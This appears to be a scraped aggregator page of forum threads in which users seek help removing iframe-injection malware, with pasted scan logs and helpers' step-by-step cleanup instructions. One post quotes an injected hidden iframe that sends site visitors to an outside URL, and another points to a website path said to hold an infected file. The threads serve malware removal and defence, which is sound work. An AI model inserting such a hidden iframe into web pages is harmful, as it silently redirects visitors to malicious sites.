Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 11:32:26 PM, on 6/21/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlservr.exe
C:\Program Files\Vongo\VongoService.exe
C:\Program Files\Linksys Wireless-G USB Wireless Network Monitor\InfoMyCa.exe
C:\Program Files\Java\jre1.6.0_01... Read more

A:Solved: Hijacker.IFrame.n

Read other 10 answers

My stepson has downloaded a virus onto my laptop.
I ran a full scan using malwarebytes, superantispyware, & avast and removed everything they found but my computer still isn't working properly.
The task manager has been remotely disabled and i can't seem to turn it back on, i cannot sytem restore, & everytime i open a new web page avast flags up as finding a virus 'HTML:Iframe.inf' as many as 5 times per page. (When I ran avast it found over 1000 of these).
I am including a hijack this log
I really need help here as I don't know what I am doing when i get beyond the basics.
Thanks in advance and here's the hijackthis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23:02:02, on 02/02/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Program Files\Google\Common\Goo... Read more

A:I can't get rid of HTML:Iframe-inf virus

Hello and welcome to TSF.

HijackThis is not used as the initial analysis tool in this forum.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a

Having problems with spyware and pop-ups? First Steps

link at the top of each page.

Please follow our pre-posting process outlined here:


After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Read other 1 answers

I'm using a little javascript to create iframes, resize them and append them to divs on a page. I got it working in FF and in IE6 and 8 but today for some reason, the iframe loads in IE6, but the javascript in the iframed file doesn't run. The iframed files open/run fine when their url's are clicked in the directory where they are located.
I was monkeying around with a script that resizes cross domain content, but
I undid any changes I made before this happened and as far as I know I didn't change anything else that would affect this.
You can see the test page here-the iframed files are on the same domain:
In FF, the comments boxes open onload and their contained script runs , in IE6 the boxes open but the script hangs at the opening statement.
Just wondering if anyone else has come across this or can throw any light on it?

A:[SOLVED] IE6 odd iframe behavior

Well, that's embarassing! I didn't make any changes to security settings (I swear), but when I just set them to "low", IE6 works again. I had specifically checked earlier to make sure the settings that allows scripts to run in iframes was enabled and it was. So not sure why, but seems to be okay now.

Read other 1 answers


first of all came a ban for my ip from spamhouse.com and some other spam baning sites, that i couldnt send any more emails (trojant sending spam from my pc?), so i installed kaspersky antivirus.

Then in found this virus on my website : Trojan-Downloader.JS.Iframe.oj (site is www.turtofondas.lt, for protecting others i changed index.php file, now the INFECTED file could be found at www.turtofondas.lt/index.php1).
Searched web for this virus - almost no useful information.

So i think now it is same virus on my PC and my website.

I just ran combofix program, but don`t know am i infected anymore. (After runing combofix used HighJackThis, log IMHO looked normal).

so, please, anyone help me to be sure with this :

1. How to clean my computer ?
2. How to clean my website ? Admin of hosting company offered to delete everything, wich doesnt sound good 4 me .... I found some <script> on web files, wich were not there originaly, i deleted them, but they again got there. How to clean the mess ? Is it only index.php or more files ?
Is it possible, that virus send my login / psswd of FTP server, that i can rebuild it`s bad path to the files?

I have todays combofix file & HJT.

Thanks for help!

Read other answers

Need help. Been noticing and obscene ammount of traffic from one of my computers did a boot scan with Avast found the iframe-inf and soon after found trojan.agent.ck with malwarebytes in my recycle bin as $R85BYD4.exe.
System seems very slow and in some cases I have lost my mouse cursor and in other cases I have my mouse cursor but cannot right or left click. Literaly had to restart my computer using keyboard only.
I seem to have a lot of activity from numerous svchosts where there is a constant stream of data up and down at about 40 to 100 kbs. I know thats not alot but its running 24/7.
Please help.

A:Trojan.agent.ck and iframe-inf

Please download TDSSKiller from here and save it to your DesktopDoubleclick on TDSSKiller.exe to run the application, then click on Change parameters

Check Loaded Modules  and Detect TDLFS file system.  Do not check Verify file digital signatures (even though it is checked in the example)If you are asked to reboot because an "Extended Monitoring Driver is required" please click Reboot now

Click Start Scan and allow the scan process to run

If threats are detected select Skip for all of them unless I instruct you otherwiseClick Continue

Click Reboot computerPlease post the contents of  TDSSKiller.[Version]_[Date]_[Time]_log.txt found in your root directory (typically c:\)in your reply===================================================aswMBR--------------------Download aswMBR and save it to your desktop.
Please disable your real time protection of any Antivirus, Antispyware or Antimalware programs temporarily. They will interfere and may cause unexpected results.If you need help to disable your protection programs see here and here.Double click the aswMBR.exe file to run it. Please allow when you are asked to download AVAST antivirus engine defs.Wait until the AV update is done, then click on the Scan button to start. The program will launch a scan.

When done, you will see Scan finished successfully. Please click on Save log and save the file to your desktop.

Please post the contents of the log in your next reply.NOTE:  aswMBR will create M... Read more

Read other 14 answers

I have run eset online scanner tool and it identifies problem as HTML/Iframe.B.Gen virus and JS/Exploit.Agent.NHC trojan.  The eset tool never completes its scan.  I have run Malwarebyte's and Rogue Killer.  Each removed some other malware but repeating those scans don't find anything now.  PC is very slow.  I have attempted to run CCleaner and it never completes it's analysis when scanning for temporary Internet files.  This is an office PC.  QS1 and Integra/Docutrack are legit applications.
Thanks for any help provided. 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 8.0.7601.17514
Run by NSSUser at 8:48:44 on 2014-08-07
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3998.1045 [GMT -4:00]
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
============== Running Processes ===============
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files (x86)\Task Killer\TaskKil... Read more

A:HTML/Iframe.B.Gen virus

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.  Please upload attach.txt as well and do the following:   Scan with Gmer rootkit scannerPlease download Gmer from here by clicking on the "Download EXE" Button.Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.If it giv... Read more

Read other 16 answers

I recently went to a website and my NOD32 came up with a Iframe.b.gen warning.
I immediately did a full scan on my computer and found nothing, but it would put my mind at rest if someone could have a look at my log files.

I ran gmer but the text files came up blank

DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Darren at 21:13:27.69 on 24/03/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_24
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.44.1033.18.6135.4461 [GMT 0:00]
AV: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
============== Running Processes ===============
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\ESET\ESET NOD32 Antivirus... Read more

A:Iframe.B.gen virus warning

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.


I'm not seeing anything in your logs. We'll do an online scanner to check for remnants shortly.


Advanced SystemCare

We do not recommend the use of registry cleaners. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling them via Programs and Features in your Control Panel.


Please uninstall the following via Start->(or Computer)->Control Panel->Programs->Programs and Features if it still exists:

Coupon Printer for Windows<<Please read here

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\Coupons


Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In 64-bit Windows Vista/Win7, you must open the 64-bit IE browser.

Navigate to C:\Program Files (x86)\Internet E... Read more

Read other 2 answers

Malicious IFrame on Gadgetadvisor.com.

Are you a gadget geek? Do you often seek advice from Gadget Advisor before making a purchase?

Our (F-Secure) Web Security Analyst discovered a malicious IFrame on the popular tech website that redirects visitors to a malicious website.

-- Tom

Read other answers

Hi Guys,

I've been suspecting that someone or something has hacked my computer, so I did a system scan with panda activescan and this has confirmed my suspicions. Its seems these files are located in Outlook 2000.

I've been suspicious about this for a few weeks but last night when some of my clients were receiving email failed notices when trying to send me emails - one of them asked if I was using a blackberry phone and whether my emails were being redirected to this phone, to which I answered "no". Therefore it appears that what ever hacker tool is lurking in Outlook could be redirecting my emails to someone else. This is only my assumption and I would like someone to confirm if this is in fact correct.

Can someone help to remove all the hacking tools in Outlook 2000, and also the spyware that activescan has picked up.

I have attached the results of activescan and also a hijackthis log file. Both are attached in notepad.


Kind Regards,


Read other 14 answers

Please help.. have Iframe.gs a script virus type of problem..all my htm file etc have been hit..can not seem to stop it spreading...malware-by does not see it ...bitdefender can not disinfect or quarantine ..so I have to delete..leave program currupted..help please

A:Iframe script/virus

Hi and welcome. Can we get a log from MBAM?run MBAM (MalwareBytes):Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so plea... Read more

Read other 1 answers

I have a small network that consist of a about 4 pc's and a web server. There has been some sort of virus infecting my web server. The virus injects my index.html files with malicious lines of codes directing users to a virus infected site. I am thinking that the virus is on one of my client pc's connecting to the server via ftp. I have ran multiple scans on the server and found nothing. Now I am leaning towards the pc's. I have posted the logs for of the first pc to review.Here is an example of the line of code this virus is putting in the index.html file of the websites:<iframe src="http://woocasino.com/s2/show.php" width="1" height="1" style="display:none;"></iframe></body>DDS (Ver_09-07-30.01) - NTFSx86 Run by richard.mcmaster at 15:23:49.85 on Fri 08/28/2009Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_15Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2014.742 [GMT -5:00]AV: McAfee VirusScan Enterprise *On-access scanning enabled* (Updated) {918A2B0B-2C60-4016-A4AB-E868DEABF7F0}============== Running Processes ===============C:\windows\system32\Ati2evxx.exeC:\windows\system32\svchost -k DcomLaunchsvchost.exeC:\windows\System32\svchost.exe -k netsvcssvchost.exesvchost.exeC:\windows\system32\spoolsv.exesvchost.exeC:\windows\IntelliAdminRC3\Agent32.exeC:\Program Files\Java\jre6\bin\jqs.exeC:&... Read more

A:Infected with Iframe virus

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 2 answers

My kids were on a MySpace page watching videos the other night and now if I try to go online for anything my avast software goes nuts and I get the line in the title. it says it is in the temp. internet files folder. I shut the computer down and let avast do a complete scan and I ran spybaster and AVG. All to no avail. S I come once again to the great guys and gals here at tech support for help. I also have a strange thing happen when I try to move a file, it moves but also brings up a box from Easy CD Creator and wants me to put in the CD to install. I don't even use that program. Weird. Below I have inclosed the files you asked for (DDS & Attach & GMER). Any help would be greatly appreciated.

GMER - http://www.gmer.net
Rootkit scan 2009-07-09 20:22:20
Windows 5.1.2600 Service Pack 2

---- Kernel code sections - GMER 1.0.15 ----

? srescan.sys The system cannot find the file specified. !
? System32\DRIVERS\AvgAsCln.sys The system cannot find the path specified. !
? C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys The system cannot find the file specified. !

---- User code sections - GMER 1.0.15 ----

.text C:\WINDOWS\system32\NOTE... Read more

A:Infected with hxxp:IFrame-HW[Trj]

Hello -

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Before beginning the fix, read this post completely. If there's anything that you do not understand, kindly ask your questions before proceeding. Ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

It is IMPORTANT that you don't miss a step & perform everything in the correct order/sequence.


Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Stay with me until given the 'all clear' even if symptoms diminish. Lack of symptoms does not always mean the job is complete.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by me or another helper at this forum.


Download ComboFix from this location:

Link 1

* IMPORTANT !!! Place combofix.exe on your Desktop
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the Sy... Read more

Read other 19 answers

Somehow I got this virus and it keeps throwing open internet explorer windows (most from reditty.com) when I use Google (my homepage) or most any other site. Also little "alert boxes" keep popping up from time to time saying "Your system is not optimized and your computer performance is not at the highest level. Full system optimization will greatly increase your computer's performance and prevent data loss. Would you like to install SystemErrorFixer to optimize your computer's performance now for free? (Recommended) YES NO) ...also photobucket and imageshack are taking FOREVER to load...
I'm going surf for a few minutes and list the sites that open on these new pages.
hxxp://www.quizrocket.com/dumb-test?gatherer_id=100449&utm_source=AdOn&utm_medium=CPM&utm... Read more

A:Solved: Hijacker.IFrame.n...AND MORE. joy for me.

Hi, Welcome to TSG!!
Visit this webpage for instructions for downloading and running ComboFix.

Post the log from ComboFix along with a new HijackThis log.

Read other 3 answers

I am using windows XP SP3 with ESET NOD v 4.0.437.0 and firefox 3.5.19

When I access some websites lately ESET NOD reports some viral activity and blocks access to a third party web address. The problem is repeatable on a these websites then seems to go away after a day or two and a similar problem may occur when accessing a different website.

One example of the threat warning is:


HTML:Iframe.B.Gen virus
Connection terminated - quarantined

A second message then appeared:

Address has been blocked:
IP address:

The website owners claimed they have checked their site with several checkers and found no virus. although jdbbank did have a legitimate link on their site.

I later got a simialr message from a completely unrelated site (cme.com) so I became suspicious that my computer may have some malware. That access reported activity by the Kryptic.E trojan, but I did not manage to copy the full details.

I ran a full scan with ESET NOD32, but found nothing.

I ran the steps in your prep guide. The DDS log is pasted below.

The attach.txt and GMER log files are attached.

Note the GMER log took nearly 12 hours to complete.

DDS (Ver_11-03-05.01) - NTFSx86
Run by Nick at 18:19:06.98 on Thu 05/05/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_23
Microsoft Windows XP Professional 5.1.2600.3.1252.61.1033.18.1526.524 [GMT 7:00]
AV: ESET NOD32 Antiv... Read more

A:Iframe.B.Gen and or Kryptik.E virus

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

Read other 18 answers